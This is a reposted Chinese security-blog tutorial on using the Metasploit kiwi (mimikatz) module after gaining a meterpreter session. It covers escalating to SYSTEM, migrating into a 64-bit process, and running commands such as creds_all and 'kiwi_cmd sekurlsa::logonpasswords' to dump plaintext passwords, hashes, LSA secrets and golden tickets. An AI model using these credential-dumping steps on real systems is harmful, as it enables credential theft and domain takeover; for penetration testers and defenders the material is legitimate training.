技术干货 | 工具的使用:MSF中kiwi模块的使用

admin 2020年10月19日18:09:42评论718 views字数 1272阅读4分14秒阅读模式

技术干货 | 工具的使用:MSF中kiwi模块的使用

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!


欢迎各位添加微信号:qinchang_198231

加入安世加 交流群 和大佬们一起交流安全技术

技术干货 | 工具的使用:MSF中kiwi模块的使用

目录

技术干货 | 工具的使用:MSF中kiwi模块的使用

1.kiwi模块

2.kiwi模块的使用

   2.1 creds_all

   2.1 kiwi_cmd



1.kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

提权到system权限

技术干货 | 工具的使用:MSF中kiwi模块的使用

进程迁移

kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。

技术干货 | 工具的使用:MSF中kiwi模块的使用
技术干货 | 工具的使用:MSF中kiwi模块的使用
技术干货 | 工具的使用:MSF中kiwi模块的使用

2.kiwi模块的使用

加载kiwi模块

load kiwi

查看kiwi模块的使用

help kiwi
技术干货 | 工具的使用:MSF中kiwi模块的使用
creds_all:列举所有凭据creds_kerberos:列举所有kerberos凭据creds_msv:列举所有msv凭据creds_ssp:列举所有ssp凭据creds_tspkg:列举所有tspkg凭据creds_wdigest:列举所有wdigest凭据dcsync:通过DCSync检索用户帐户信息dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RIDgolden_ticket_create:创建黄金票据kerberos_ticket_list:列举kerberos票据kerberos_ticket_purge:清除kerberos票据kerberos_ticket_use:使用kerberos票据kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令lsa_dump_sam:dump出lsa的SAMlsa_dump_secrets:dump出lsa的密文password_change:修改密码wifi_list:列出当前用户的wifi配置文件wifi_list_shared:列出共享wifi配置文件/编码

creds_all

该命令可以列举系统中的明文密码

技术干货 | 工具的使用:MSF中kiwi模块的使用

kiwi_cmd

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令

kiwi_cmd sekurlsa::logonpasswords
技术干货 | 工具的使用:MSF中kiwi模块的使用
其他模块的用法后续会在原文慢慢更新。
技术干货 | 工具的使用:MSF中kiwi模块的使用

:Shawn

技术干货 | 工具的使用:MSF中kiwi模块的使用


本文始发于微信公众号(安世加):技术干货 | 工具的使用:MSF中kiwi模块的使用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月19日18:09:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   技术干货 | 工具的使用:MSF中kiwi模块的使用http://cn-sec.com/archives/160599.html

发表评论

匿名网友 填写信息